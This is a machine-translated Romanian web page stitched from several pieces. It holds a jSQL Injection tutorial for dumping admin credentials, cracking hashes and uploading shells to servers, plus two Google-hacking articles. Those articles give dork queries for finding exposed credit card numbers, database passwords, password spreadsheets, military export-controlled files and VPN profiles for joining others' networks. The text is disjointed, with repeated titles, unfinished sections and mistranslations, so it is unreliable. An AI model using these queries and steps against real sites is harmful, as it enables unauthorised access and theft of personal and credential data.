Folosim funcții Google puțin cunoscute pentru a găsi lucruri ascunse. Instrucțiuni pentru utilizarea jSQL Injection - un instrument multifuncțional pentru căutarea și exploatarea injecțiilor SQL în Kali Linux Companies inurl img php id

Folosim funcții Google puțin cunoscute pentru a găsi lucruri ascunse. Instrucțiuni pentru utilizarea jSQL Injection - un instrument multifuncțional pentru căutarea și exploatarea injecțiilor SQL în Kali Linux Companies inurl img php id
Folosim funcții Google puțin cunoscute pentru a găsi lucruri ascunse. Instrucțiuni pentru utilizarea jSQL Injection - un instrument multifuncțional pentru căutarea și exploatarea injecțiilor SQL în Kali Linux Companies inurl img php id
24.04.2020

Rulați fișierul descărcat dublu clic(trebuie să aibă mașină virtuală ).

3. Anonimitatea la verificarea unui site pentru injectare SQL
Configurarea Tor și Privoxy în Kali Linux

[Secțiune în curs de dezvoltare]

Configurarea Tor și Privoxy pe Windows

[Secțiune în curs de dezvoltare]

Setări proxy în jSQL Injection

[Secțiune în curs de dezvoltare]

4. Verificarea site-ului pentru injectare SQL cu jSQL Injection

Lucrul cu programul este extrem de simplu. Doar introduceți adresa site-ului web și apăsați ENTER.

Următoarea captură de ecran arată că site-ul este vulnerabil la trei tipuri de injecții SQL simultan (informațiile despre acestea sunt indicate în colțul din dreapta jos). Făcând clic pe numele injecțiilor, puteți schimba metoda utilizată:

De asemenea, bazele de date existente ne-au fost deja afișate.

Puteți vizualiza conținutul fiecărui tabel:

De obicei, cel mai interesant lucru despre tabele sunt acreditările de administrator.

Dacă aveți noroc și găsiți datele administratorului, atunci este prea devreme să vă bucurați. Încă trebuie să găsiți panoul de administrare unde să introduceți aceste date.

5. Căutați panouri de administrare cu jSQL Injection

Pentru a face acest lucru, mergeți la următoarea filă. Aici suntem întâmpinați cu o listă de adrese posibile. Puteți selecta una sau mai multe pagini pentru a verifica:

Comoditatea constă în faptul că nu trebuie să utilizați alte programe.

Din păcate, nu există foarte mulți programatori neglijenți care stochează parolele în text clar. Destul de des în linia parolei vedem ceva de genul

8743b52063cd84097a65d1633f5c74f5

Acesta este un hash. Îl puteți decripta folosind forța brută. Și... jSQL Injection are un brute forcer încorporat.

6. Hash-uri de forță brută folosind jSQL Injection

Comoditatea incontestabilă este că nu trebuie să cauți alte programe. Există suport pentru multe dintre cele mai populare hashe-uri.

Aceasta nu este cea mai bună opțiune. Pentru a deveni un guru în decodarea hashurilor, este recomandată Cartea „” în rusă.

Dar, desigur, atunci când nu există alt program la îndemână sau nu există timp pentru a studia, jSQL Injection cu funcția de forță brută încorporată va fi foarte utilă.

Există setări: puteți seta ce caractere sunt incluse în parolă, intervalul de lungime a parolei.

7. Operațiuni cu fișiere după detectarea injecțiilor SQL

Pe lângă operațiunile cu baze de date - citirea și modificarea acestora, dacă sunt detectate injecții SQL, pot fi efectuate următoarele operațiuni cu fișiere:

  • citirea fișierelor de pe server
  • încărcarea fișierelor noi pe server
  • încărcarea shell-urilor pe server

Și toate acestea sunt implementate în jSQL Injection!

Există restricții - serverul SQL trebuie să aibă privilegii de fișier. Administratorii de sistem inteligent le au dezactivate și nu vor putea avea acces la sistemul de fișiere.

Prezența privilegiilor de fișier este destul de simplu de verificat. Accesați una dintre file (citirea fișierelor, crearea unui shell, încărcarea unui fișier nou) și încercați să efectuați una dintre operațiunile specificate.

O altă notă foarte importantă - trebuie să știm calea absolută exactă către fișierul cu care vom lucra - altfel nimic nu va funcționa.

Uită-te la următoarea captură de ecran:

La orice încercare de a opera asupra unui fișier, ni se răspunde: No FILE privilege (fără privilegii de fișier). Și nu se poate face nimic aici.

Dacă în schimb aveți o altă eroare:

Problemă la scrierea în [nume_director]

Aceasta înseamnă că ați specificat incorect calea absolută în care doriți să scrieți fișierul.

Pentru a ghici o cale absolută, trebuie să cunoașteți cel puțin sistemul de operare pe care rulează serverul. Pentru a face acest lucru, treceți la fila Rețea.

Această intrare (linia Win64) ne oferă motive să presupunem că avem de-a face cu sistemul de operare Windows:

Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Conexiune: Keep-Alive Metoda: HTTP/1.1 200 OK Lungime conținut: 353 Data: Vineri, 11 Dec 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Tip de conținut: text/html; set de caractere=UTF-8

Aici avem câteva Unix (*BSD, Linux):

Codificare transfer: fragmentat Data: vineri, 11 decembrie 2015 11:57:02 GMT Metodă: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Conexiune: keep-alive Tip de conținut: text/html X- Produs de: PHP/5.3.29 Server: Apache/2.2.31 (Unix)

Și aici avem CentOS:

Metodă: HTTP/1.1 200 OK Expiră: Joi, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Conexiune: keep-alive X-Cache-Lookup: MISS de la t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS de la t1.hoster.ru Cache-Control: fără stocare, fără cache, revalidare obligatorie, post-verificare=0, pre-verificare=0 Pragma: fără cache Data: vineri, 11 decembrie 2015 12:08:54 GMT Transfer-Encoding: chunked Content-Type: text/html; set de caractere=WINDOWS-1251

Pe Windows, un folder tipic pentru site-uri este C:\Server\data\htdocs\ . Dar, de fapt, dacă cineva „s-a gândit” să facă un server pe Windows, atunci, foarte probabil, această persoană nu a auzit nimic despre privilegii. Prin urmare, ar trebui să începeți să încercați direct din directorul C:/Windows/:

După cum puteți vedea, totul a mers bine prima dată.

Dar shell-urile jSQL Injection în sine ridică îndoieli în mintea mea. Dacă aveți privilegii de fișier, atunci puteți încărca cu ușurință ceva cu o interfață web.

8. Verificarea în bloc a site-urilor pentru injecții SQL

Și chiar și această funcție este disponibilă în jSQL Injection. Totul este extrem de simplu - descărcați o listă de site-uri (le puteți importa dintr-un fișier), selectați-le pe cele pe care doriți să le verificați și faceți clic pe butonul corespunzător pentru a începe operația.

Concluzie din jSQL Injection

jSQL Injection este un instrument bun și puternic pentru căutarea și apoi utilizarea injecțiilor SQL găsite pe site-uri web. Avantajele sale neîndoielnice: ușurință în utilizare, funcții aferente încorporate. jSQL Injection poate fi cel mai bun prieten al începătorilor atunci când analizează site-uri web.

Printre neajunsuri, as remarca imposibilitatea editării bazelor de date (cel puțin nu am găsit această funcționalitate). Ca și în cazul tuturor instrumentelor GUI, unul dintre dezavantajele acestui program poate fi atribuit incapacității sale de a fi utilizat în scripturi. Cu toate acestea, este posibilă și o anumită automatizare în acest program - datorită funcției încorporate de verificare în masă a site-ului.

Programul jSQL Injection este mult mai convenabil de utilizat decât sqlmap. Dar sqlmap acceptă mai multe tipuri de injecții SQL, are opțiuni de lucru cu firewall-uri de fișiere și alte funcții.

Concluzie: jSQL Injection - cel mai bun prieten hacker începător.

Ajutorul pentru acest program din Enciclopedia Kali Linux poate fi găsit pe această pagină: http://kali.tools/?p=706

Obținerea datelor private nu înseamnă întotdeauna hacking - uneori sunt publicate în accesul publicului. Cunoașterea setărilor Google și puțină ingeniozitate vă vor permite să găsiți o mulțime de lucruri interesante - de la numere de card de credit la documente FBI.

AVERTISMENT Toate informațiile sunt furnizate doar în scop informativ. Nici editorii, nici autorul nu sunt responsabili pentru eventualele daune cauzate de materialele acestui articol.

Astăzi, totul este conectat la Internet, cu puțină grijă pentru restricționarea accesului. Prin urmare, multe date private devin prada motoarelor de căutare. Roboții păianjen nu se mai limitează la pagini web, ci indexează tot conținutul disponibil pe Internet și adaugă în mod constant informații non-publice în bazele lor de date. Aflarea acestor secrete este ușor - trebuie doar să știi cum să întrebi despre ele.

Caut fișiere

În mâini capabile, Google va găsi rapid tot ceea ce nu se găsește pe Internet, de exemplu, informații personale și fișiere pentru uz oficial. Ele sunt adesea ascunse ca o cheie sub un covor: nu există restricții reale de acces, datele se află pur și simplu pe spatele site-ului, unde nu duc linkuri. Interfața web standard Google oferă doar setări de căutare avansate de bază, dar chiar și acestea vor fi suficiente.

Vă puteți limita căutarea pe Google la un anumit tip de fișier folosind doi operatori: filetype și ext . Primul specifică formatul pe care motorul de căutare l-a determinat din titlul fișierului, al doilea specifică extensia fișierului, indiferent de conținutul său intern. Când căutați în ambele cazuri, trebuie doar să specificați extensia. Inițial, operatorul ext era convenabil de utilizat în cazurile în care fișierul nu avea caracteristici specifice de format (de exemplu, pentru a căuta fișiere de configurare ini și cfg, care ar putea conține orice). Acum algoritmi Google s-au schimbat și nu există nicio diferență vizibilă între operatori - rezultatele în majoritatea cazurilor sunt aceleași.


Filtrarea rezultatelor

În mod implicit, Google caută cuvinte și, în general, orice caractere introduse în toate fișierele din paginile indexate. Puteți limita căutarea după domeniu nivel superior, un anumit site sau la locația secvenței dorite în fișierele în sine. Pentru primele două opțiuni, utilizați operatorul site-ului, urmat de numele domeniului sau al site-ului selectat. În al treilea caz, un întreg set de operatori vă permite să căutați informații în câmpurile de servicii și metadate. De exemplu, allinurl îl va găsi pe cel dat în corpul link-urilor în sine, allinanchor - în textul echipat cu eticheta , allintitle - în titlurile paginilor, allintext - în corpul paginilor.

Pentru fiecare operator există o versiune ușoară cu un nume mai scurt (fără prefixul all). Diferența este că allinurl va găsi link-uri cu toate cuvintele, iar inurl va găsi link-uri doar cu primul dintre ele. Al doilea și următoarele cuvinte din interogare pot apărea oriunde pe paginile web. Operatorul inurl diferă, de asemenea, de un alt operator cu sens similar - site. Primul vă permite, de asemenea, să găsiți orice secvență de caractere într-un link către documentul căutat (de exemplu, /cgi-bin/), care este utilizat pe scară largă pentru a găsi componente cu vulnerabilități cunoscute.

Să încercăm în practică. Luăm filtrul allintext și facem ca cererea să producă o listă de numere și coduri de verificare ale cărților de credit care vor expira abia peste doi ani (sau când proprietarii lor se obosesc să hrănească pe toată lumea).

Allintext: data expirării numărului cardului /2017 cvv

Când citiți în știri că un tânăr hacker „a pătruns în serverele” Pentagonului sau NASA, furând informații clasificate, în cele mai multe cazuri vorbim doar despre o tehnică de bază de utilizare a Google. Să presupunem că suntem interesați de o listă a angajaților NASA și de informațiile lor de contact. Cu siguranță o astfel de listă este disponibilă în formă electronică. Pentru comoditate sau din cauza supravegherii, poate fi și pe site-ul web al organizației. Este logic că în acest caz nu vor exista legături către acesta, deoarece este destinat uzului intern. Ce cuvinte pot fi într-un astfel de fișier? Cel puțin - câmpul „adresă”. Testarea tuturor acestor ipoteze este ușoară.


Inurl:nasa.gov filetype:xlsx „adresă”


Folosim birocrația

Astfel de descoperiri sunt o atingere plăcută. O captură cu adevărat solidă este oferită de o cunoaștere mai detaliată a operatorilor Google pentru webmasteri, a rețelei în sine și a particularităților structurii a ceea ce este căutat. Cunoscând detaliile, puteți filtra cu ușurință rezultatele și rafina proprietățile fișierelor necesare pentru a obține date cu adevărat valoroase în rest. E amuzant că birocrația vine în ajutor aici. Produce formulări standard care sunt convenabile pentru căutarea informațiilor secrete scurse accidental pe Internet.

De exemplu, ștampila Declarație de distribuție, obligatorie în biroul Departamentului de Apărare al SUA, înseamnă restricții standardizate privind distribuirea documentului. Litera A denotă lansări publice în care nu există nimic secret; B – destinat doar uzului intern, C – strict confidențial, și așa mai departe până la F. Se remarcă separat litera X, care marchează informații deosebit de valoroase reprezentând un secret de stat de cel mai înalt nivel. Lăsați cei care ar trebui să facă acest lucru la serviciu să caute astfel de documente și ne vom limita la fișiere cu litera C. Conform directivei DoDI 5230.24, acest marcaj este atribuit documentelor care conțin o descriere a tehnologiilor critice care intră sub controlul exportului. . Astfel de informații atent protejate pot fi găsite pe site-urile din domeniul de nivel superior domain.mil, alocat pentru Armata SUA.

„CONTACT DE DISTRIBUȚIE C” inurl:navy.mil

Este foarte convenabil ca domeniul .mil să conțină numai site-uri de la Departamentul Apărării al SUA și organizațiile sale contractuale. Rezultatele căutării cu o restricție de domeniu sunt excepțional de curate, iar titlurile vorbesc de la sine. Căutarea secretelor rusești în acest fel este practic inutilă: haosul domnește în domains.ru și.rf, iar numele multor sisteme de arme sună ca cele botanice (PP „Kiparis”, tunuri autopropulsate „Akatsia”) sau chiar fabulos ( TOS „Buratino”).


Studiind cu atenție orice document de pe un site din domeniul .mil, puteți vedea și alți markeri pentru a vă rafina căutarea. De exemplu, o referire la restricțiile de export „Sec 2751”, care este, de asemenea, convenabilă pentru căutarea de informații tehnice interesante. Din când în când este eliminat de pe site-urile oficiale unde a apărut cândva, așa că dacă nu puteți urmări un link interesant în rezultatele căutării, utilizați cache-ul Google (operatorul cache) sau site-ul Internet Archive.

Urcând în nori

Pe lângă documentele guvernamentale declasificate accidental, în memoria cache Google apar ocazional linkuri către fișiere personale din Dropbox și alte servicii de stocare a datelor care creează linkuri „private” către date publicate public. Este și mai rău cu serviciile alternative și de casă. De exemplu, următoarea interogare găsește date pentru toți clienții Verizon care au un server FTP instalat și își folosesc în mod activ routerul.

Allinurl:ftp:// verizon.net

Acum există peste patruzeci de mii de astfel de oameni deștepți, iar în primăvara lui 2015 au fost mult mai mulți. În loc de Verizon.net, puteți înlocui numele oricărui furnizor cunoscut și, cu cât este mai faimos, cu atât captura poate fi mai mare. Prin serverul FTP încorporat, puteți vedea fișierele de pe un dispozitiv de stocare extern conectat la router. De obicei, acesta este un NAS pentru lucru la distanță, un cloud personal sau un fel de descărcare de fișiere peer-to-peer. Tot conținutul acestor medii este indexat de Google și de alte motoare de căutare, astfel încât să puteți accesa fișierele stocate pe unități externe printr-un link direct.

Privind configurațiile

Înainte de migrarea pe scară largă în cloud, serverele FTP simple guvernau ca stocare la distanță, care avea și o mulțime de vulnerabilități. Multe dintre ele sunt și astăzi relevante. De exemplu, popularul program WS_FTP Professional stochează datele de configurare, conturile de utilizator și parolele în fișierul ws_ftp.ini. Este ușor de găsit și citit, deoarece toate înregistrările sunt salvate în format text, iar parolele sunt criptate cu algoritmul Triple DES după o ofuscare minimă. În majoritatea versiunilor, este suficientă eliminarea primului octet.

Este ușor să decriptați astfel de parole folosind utilitarul WS_FTP Password Decryptor sau un serviciu web gratuit.

Când vorbim despre piratarea unui site web arbitrar, acestea înseamnă, de obicei, obținerea unei parole din jurnalele și copiile de rezervă ale fișierelor de configurare ale aplicațiilor CMS sau de comerț electronic. Dacă cunoașteți structura lor tipică, puteți indica cu ușurință cuvinte cheie. Liniile ca cele găsite în ws_ftp.ini sunt extrem de comune. De exemplu, în Drupal și PrestaShop există întotdeauna un identificator de utilizator (UID) și o parolă corespunzătoare (pwd), iar toate informațiile sunt stocate în fișiere cu extensia .inc. Le puteți căuta după cum urmează:

"pwd=" "UID=" ext:inc

Dezvăluirea parolelor DBMS

În fișierele de configurare ale serverelor SQL, numele de utilizator și adresele de e-mail sunt stocate în text clar, iar hashurile lor MD5 sunt scrise în loc de parole. Strict vorbind, este imposibil să le decriptați, dar puteți găsi o potrivire între perechile hash-parolă cunoscute.

Există încă SGBD-uri care nici măcar nu folosesc hashingul parolei. Fișierele de configurare ale oricăruia dintre ele pot fi pur și simplu vizualizate în browser.

Intext:DB_PASSWORD tip de fișier:env

De când a apărut pe servere Windows Locul fișierelor de configurare a fost parțial luat de registru. Puteți căuta prin ramurile sale exact în același mod, folosind reg ca tip de fișier. De exemplu, așa:

Tip de fișier: reg HKEY_CURRENT_USER „Parolă”=

Să nu uităm de evident

Uneori este posibil să ajungeți la informații clasificate cu ajutorul unor deschideri accidentale și prinse în câmpul vizual. Date Google. Opțiunea ideală este să găsești o listă de parole într-un format comun. Stocați informațiile despre cont într-un fișier text, document Word sau electronice Foaie de calcul Excel Doar oamenii disperați pot, dar sunt întotdeauna destui.

Tip de fișier:xls inurl:parolă

Pe de o parte, există o mulțime de mijloace pentru a preveni astfel de incidente. Este necesar să specificați drepturi de acces adecvate în htaccess, să corectați CMS-ul, să nu folosiți scripturi pentru stângaci și să închideți alte găuri. Există, de asemenea, un fișier cu o listă de excepții robots.txt care interzice motoarelor de căutare să indexeze fișierele și directoarele specificate în acesta. Pe de altă parte, dacă structura robots.txt pe un anumit server diferă de cea standard, atunci devine imediat clar ce încearcă ei să ascundă pe el.

Lista directoarelor și fișierelor de pe orice site este precedată de indexul standard al. Deoarece în scopuri de serviciu trebuie să apară în titlu, este logic să se limiteze căutarea la operatorul de titlu. Lucruri interesante sunt în directoarele /admin/, /personal/, /etc/ și chiar /secret/.

Rămâneți pe fază pentru actualizări

Relevanța este extrem de importantă aici: vulnerabilitățile vechi sunt închise foarte lent, dar Google și rezultatele căutării sale se schimbă constant. Există chiar o diferență între un filtru „ultima secundă” (&tbs=qdr:s la sfârșitul adresei URL de solicitare) și un filtru „în timp real” (&tbs=qdr:1).

Intervalul de timp al ultimei date de actualizare a fișierului este indicat și implicit de Google. Prin interfața web grafică, puteți selecta una dintre perioadele standard (oră, zi, săptămână etc.) sau puteți seta un interval de date, dar această metodă nu este potrivită pentru automatizare.

Din aspectul barei de adrese, puteți doar ghici despre o modalitate de a limita rezultatul utilizând construcția &tbs=qdr:. Litera y după ce stabilește limita de un an (&tbs=qdr:y), m arată rezultatele pentru ultima lună, w - pentru săptămână, d - pentru ziua trecută, h - pentru ultima oră, n - pentru minut și s - pentru secundă. Cele mai recente rezultate pe care Google tocmai le-a făcut cunoscute se găsesc folosind filtrul &tbs=qdr:1 .

Dacă trebuie să scrieți un script inteligent, va fi util să știți că intervalul de date este setat în Google în format Julian folosind operatorul interval de date. De exemplu, așa puteți găsi o listă Documente PDF cu cuvântul confidențial, încărcat de la 1 ianuarie până la 1 iulie 2015.

Tip de fișier confidențial: pdf interval de date: 2457024-2457205

Intervalul este indicat în formatul de dată Julian fără a lua în considerare partea fracțională. Traducerea lor manuală din calendarul gregorian este incomod. Este mai ușor să utilizați un convertor de date.

Direcționarea și filtrarea din nou

Pe lângă specificarea operatorilor suplimentari în interogarea de căutare, aceștia pot fi trimiși direct în corpul link-ului. De exemplu, specificația filetype:pdf corespunde construcției as_filetype=pdf . Acest lucru face convenabil să solicitați orice clarificări. Să presupunem că rezultatul rezultatelor numai din Republica Honduras este specificat prin adăugarea construcției cr=countryHN la adresa URL de căutare și numai din orașul Bobruisk - gcs=Bobruisk. Puteți găsi o listă completă în secțiunea pentru dezvoltatori.

Instrumentele de automatizare Google sunt concepute pentru a face viața mai ușoară, dar adesea adaugă probleme. De exemplu, orașul utilizatorului este determinat de IP-ul utilizatorului prin WHOIS. Pe baza acestor informații, Google nu numai că echilibrează sarcina dintre servere, ci modifică și rezultatele căutării. În funcție de regiune, pentru aceeași solicitare, pe prima pagină vor apărea rezultate diferite, iar unele dintre ele pot fi complet ascunse. Codul din două litere după directiva gl=country vă va ajuta să vă simțiți ca un cosmopolit și să căutați informații din orice țară. De exemplu, codul Olandei este NL, dar Vaticanul și Coreea de Nord nu au propriul cod în Google.

Adesea, rezultatele căutării ajung să fie aglomerate chiar și după utilizarea mai multor filtre avansate. În acest caz, este ușor să clarificați cererea prin adăugarea mai multor cuvinte de excepție (în fața fiecăruia dintre ele este plasat un semn minus). De exemplu, serviciile bancare, numele și tutorialul sunt adesea folosite cu cuvântul Personal. Prin urmare, rezultatele căutării mai curate vor fi afișate nu printr-un exemplu manual de interogare, ci printr-unul rafinat:

Intitle:"Index of /Personal/" -nume -tutorial -banking

Un ultim exemplu

Un hacker sofisticat se distinge prin faptul că se asigură singur cu tot ce are nevoie. De exemplu, VPN este un lucru convenabil, dar fie scump, fie temporar și cu restricții. Înregistrarea pentru un abonament pentru tine este prea costisitoare. E bine că există abonamente de grup, iar cu ajutorul Google este ușor să faci parte dintr-un grup. Pentru a face acest lucru, trebuie doar să găsiți fișierul de configurare Cisco VPN, care are o extensie PCF destul de non-standard și o cale recunoscută: Program Files\Cisco Systems\VPN Client\Profiles. O singură cerere și vă alăturați, de exemplu, echipei prietenoase a Universității din Bonn.

Tip de fișier: pcf vpn SAU grup

INFORMAȚII găsește Google fișierele de configurare cu parole, dar multe dintre ele sunt scrise în formă criptată sau înlocuite cu hash. Dacă vedeți șiruri de lungime fixă, atunci căutați imediat un serviciu de decriptare.

Parolele sunt stocate criptate, dar Maurice Massard a scris deja un program pentru a le decripta și îl oferă gratuit prin thecampusgeeks.com.

Google rulează sute de tipuri diferite de atacuri și teste de penetrare. Există multe opțiuni, care afectează programe populare, formate majore de baze de date, numeroase vulnerabilități ale PHP, nori și așa mai departe. Știind exact ce căutați, vă va fi mult mai ușor să găsiți informațiile de care aveți nevoie (în special informațiile pe care nu intenționați să le faceți publice). Shodan nu este singurul care alimentează idei interesante, ci fiecare bază de date indexată resursele rețelei!

Hacking cu Google

Alexandru Antipov

Motorul de căutare Google (www.google.com) oferă multe opțiuni de căutare. Toate aceste caracteristici sunt un instrument de căutare neprețuit pentru un utilizator nou pe Internet și, în același timp, o armă și mai puternică de invazie și distrugere în mâinile oamenilor cu intenții rele, inclusiv nu numai hackeri, ci și criminali care nu sunt informatici și chiar și teroriști.
(9475 vizualizări într-o săptămână)


Denis Barankov
denisNOSPAMixi.ru

Atenţie: Acest articol nu este un ghid de acțiune. Acest articol a fost scris pentru voi, administratori de servere WEB, astfel încât să vă pierdeți falsul sentiment că sunteți în siguranță și să înțelegeți în sfârșit insidiosul acestei metode de obținere a informațiilor și să vă preluați sarcina de a vă proteja site-ul.

Introducere

De exemplu, am găsit 1670 de pagini în 0,14 secunde!

2. Introduceți o altă linie, de exemplu:

inurl:"auth_user_file.txt"

puțin mai puțin, dar acest lucru este deja suficient pentru descărcarea gratuită și pentru ghicirea parolei (folosind același John The Ripper). Mai jos voi da mai multe exemple.

Așadar, trebuie să vă dați seama că motorul de căutare Google a vizitat majoritatea site-urilor de internet și a stocat în cache informațiile conținute de ele. Aceste informații stocate în cache vă permit să obțineți informații despre site și conținutul site-ului fără a vă conecta direct la site, doar prin adâncirea în informațiile care sunt stocate în interiorul Google. Mai mult, dacă informațiile de pe site nu mai sunt disponibile, atunci informațiile din cache pot fi în continuare păstrate. Tot ce aveți nevoie pentru această metodă este să cunoașteți câteva cuvinte cheie Google. Această tehnică se numește Google Hacking.

Informațiile despre Google Hacking au apărut pentru prima dată pe lista de corespondență Bugtruck acum 3 ani. În 2001, acest subiect a fost abordat de un student francez. Iată un link către această scrisoare http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. Acesta oferă primele exemple de astfel de interogări:

1) Index de /admin
2) Index de /parolă
3) Index de /mail
4) Index pentru / +banques +filetype:xls (pentru Franța...)
5) Index de / +passwd
6) Index de / parola.txt

Acest subiect a făcut furori în partea de citit în engleză a internetului destul de recent: după articolul lui Johnny Long, publicat pe 7 mai 2004. Pentru un studiu mai complet al Google Hacking, vă sfătuiesc să accesați site-ul web al acestui autor http://johnny.ihackstuff.com. În acest articol vreau doar să vă aduc la curent.

Cine poate folosi asta:
- Jurnaliştii, spionii şi toţi acei oameni cărora le place să bage nasul în afacerile altora pot folosi acest lucru pentru a căuta dovezi incriminatoare.
- Hackerii care caută ținte potrivite pentru hacking.

Cum funcționează Google.

Pentru a continua conversația, permiteți-mi să vă reamintesc câteva dintre cuvintele cheie folosite în interogările Google.

Căutați folosind semnul +

Google exclude cuvintele pe care le consideră neimportante din căutări. De exemplu, cuvintele de întrebare, prepozițiile și articolele în limba engleză: de exemplu, are, of, where. În rusă, Google pare să considere toate cuvintele importante. Dacă un cuvânt este exclus din căutare, Google scrie despre el. Pentru ca Google să înceapă să caute pagini cu aceste cuvinte, trebuie să adăugați un semn + fără spațiu înaintea cuvântului. De exemplu:

as +de bază

Căutați folosind semnul -

Dacă Google găsește un număr mare de pagini din care trebuie să excludă pagini cu un anumit subiect, atunci puteți forța Google să caute numai pagini care nu conțin anumite cuvinte. Pentru a face acest lucru, trebuie să indicați aceste cuvinte punând un semn în fața fiecăruia - fără spațiu înaintea cuvântului. De exemplu:

pescuit - vodca

Căutați folosind ~

Poate doriți să căutați nu numai cuvântul specificat, ci și sinonimele acestuia. Pentru a face acest lucru, precedați cuvântul cu simbolul ~.

Găsirea unei expresii exacte folosind ghilimele duble

Google caută pe fiecare pagină toate aparițiile cuvintelor pe care le-ați scris în șirul de interogare și nu îi pasă de poziția relativă a cuvintelor, atâta timp cât toate cuvintele specificate sunt pe pagină în același timp (acesta este acțiunea implicită). Pentru a găsi expresia exactă, trebuie să o puneți între ghilimele. De exemplu:

"suport de carte"

Pentru a avea cel puțin unul dintre cuvintele specificate, trebuie să specificați în mod explicit operația logică: SAU. De exemplu:

carte de siguranță SAU protecție

În plus, puteți folosi semnul * din bara de căutare pentru a indica orice cuvânt și. a reprezenta orice personaj.

Găsirea cuvintelor folosind operatori suplimentari

Există operatori de căutare care sunt specificați în șirul de căutare în formatul:

operator:termen_căutare

Nu sunt necesare spații de lângă două puncte. Dacă introduceți un spațiu după două puncte, veți vedea un mesaj de eroare, iar înaintea acestuia, Google le va folosi ca șir de căutare normal.
Există grupuri de operatori de căutare suplimentari: limbi - indicați în ce limbă doriți să vedeți rezultatul, data - limitați rezultatele din ultimele trei, șase sau 12 luni, apariții - indicați unde în document trebuie să căutați linia: peste tot, în titlu, în URL, domenii - căutați pe site-ul specificat sau, dimpotrivă, excludeți-l din căutarea sigură - blochează site-urile care conțin tipul specificat de informații și le elimină din paginile cu rezultatele căutării;
În același timp, unii operatori nu necesită un parametru suplimentar, de exemplu, cererea „cache:www.google.com” poate fi numită ca șir de căutare cu drepturi depline, iar unele cuvinte cheie, dimpotrivă, necesită o căutare cuvânt, de exemplu „site:www.google.com help”. În lumina subiectului nostru, să ne uităm la următorii operatori:

Operator

Descriere

Necesită parametru suplimentar?

căutați numai pe site-ul specificat în search_term

căutați numai în documente cu tipul search_term

găsiți pagini care conțin search_term în titlu

găsiți pagini care conțin toate cuvintele search_term din titlu

găsiți pagini care conțin cuvântul search_term în adresa lor

găsiți pagini care conțin toate cuvintele search_term în adresa lor

Site: operatorul limitează căutarea doar la site-ul specificat și puteți specifica nu numai numele domeniului, ci și adresa IP. De exemplu, introduceți:

operator filetype: limitează căutarea la un anumit tip de fișier. De exemplu:

Începând cu data publicării articolului, Google poate căuta în 13 formate de fișiere diferite:

  • Format de document portabil Adobe (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (săptămâna 1, săptămâna2, săptămâna3, săptămâna4, săptămâna5, săptămînă, săptămînă, wku)
  • Lotus WordPro (lwp)
  • MacWrite (mw)
  • Microsoft Excel(xls)
  • Microsoft PowerPoint (ppt)
  • Microsoft Word (doc)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Write (scriere)
  • Format text îmbogățit (rtf)
  • Shockwave Flash (swf)
  • Text (ans, txt)

Operator de link: Afișează toate paginile care indică pagina specificată.
Probabil că este întotdeauna interesant să vezi câte locuri de pe Internet știu despre tine. Să încercăm:

Operator cache: arată versiunea site-ului în memoria cache a Google, așa cum arăta ultima dată când Google a vizitat pagina respectivă. Să luăm orice site care se schimbă frecvent și să vedem:

operator intitle: caută un cuvânt specificat în titlul unei pagini. Operatorul allintitle: este o extensie - caută toate cuvintele multiple specificate în titlul paginii. Comparaţie:

intitle:zbor spre Marte
intitle:zbor intitle:pe intitle:marte
allintitle:zbor pe Marte

Operatorul inurl: determină Google să afișeze toate paginile care conțin șirul specificat în adresa URL. operator allinurl: caută toate cuvintele dintr-o adresă URL. De exemplu:

allinurl:acid acid_stat_alerts.php

Această comandă este utilă în special pentru cei care nu au SNORT - cel puțin pot vedea cum funcționează pe un sistem real.

Metode de hacking folosind Google

Așadar, am aflat că folosind o combinație a operatorilor și a cuvintelor cheie de mai sus, oricine poate colecta informațiile necesare și poate căuta vulnerabilități. Aceste tehnici sunt adesea numite Google Hacking.

Harta site-ului

Puteți folosi operatorul site: pentru a lista toate linkurile pe care Google le-a găsit pe un site. De obicei, paginile care sunt create dinamic de scripturi nu sunt indexate folosind parametri, așa că unele site-uri folosesc filtre ISAPI, astfel încât linkurile să nu aibă forma /article.asp?num=10&dst=5 , ci cu bare oblice /article/abc/num/ 10/ dst/5. Acest lucru se face astfel încât site-ul să fie în general indexat de motoarele de căutare.

Să încercăm:

site: www.whitehouse.gov whitehouse

Google crede că fiecare pagină de pe un site web conține cuvântul whitehouse. Acesta este ceea ce folosim pentru a obține toate paginile.
Există și o versiune simplificată:

site:whitehouse.gov

Și cea mai bună parte este că camarazii de la whitehouse.gov nici măcar nu știau că ne-am uitat la structura site-ului lor și chiar ne-am uitat la paginile din cache pe care le-a descărcat Google. Aceasta poate fi folosită pentru a studia structura site-urilor și a vizualiza conținutul, rămânând nedetectat pentru moment.

Vizualizați o listă de fișiere din directoare

Serverele WEB pot afișa liste de directoare de server în loc de HTML obișnuit pagini. Acest lucru se face de obicei pentru a încuraja utilizatorii să selecteze și să descarce anumite fișiere. Cu toate acestea, în multe cazuri, administratorii nu au intenția de a afișa conținutul unui director. Acest lucru se întâmplă din cauza configurației incorecte a serverului sau a lipsei pagina de startîn director. Drept urmare, hackerul are șansa de a găsi ceva interesant în director și de a-l folosi în propriile scopuri. Pentru a găsi toate astfel de pagini, este suficient să rețineți că toate conțin în titlu cuvintele: index of. Dar, deoarece indexul cuvintelor din conține nu numai astfel de pagini, trebuie să rafinăm interogarea și să luăm în considerare cuvintele cheie din pagina în sine, deci interogări precum:

intitle:index.of directorul părinte
intitle:index.de dimensiunea numelui

Deoarece cele mai multe listări de directoare sunt intenționate, este posibil să aveți dificultăți în a găsi înregistrări deplasate prima dată. Dar cel puțin puteți utiliza deja listări pentru a determina versiunea serverului WEB, așa cum este descris mai jos.

Obținerea versiunii de server WEB.

Cunoașterea versiunii serverului WEB este întotdeauna utilă înainte de a lansa orice atac de hacker. Din nou, datorită Google, puteți obține aceste informații fără a vă conecta la un server. Dacă te uiți cu atenție la lista de directoare, poți vedea că numele serverului WEB și versiunea acestuia sunt afișate acolo.

Apache1.3.29 - Server ProXad la trf296.free.fr Port 80

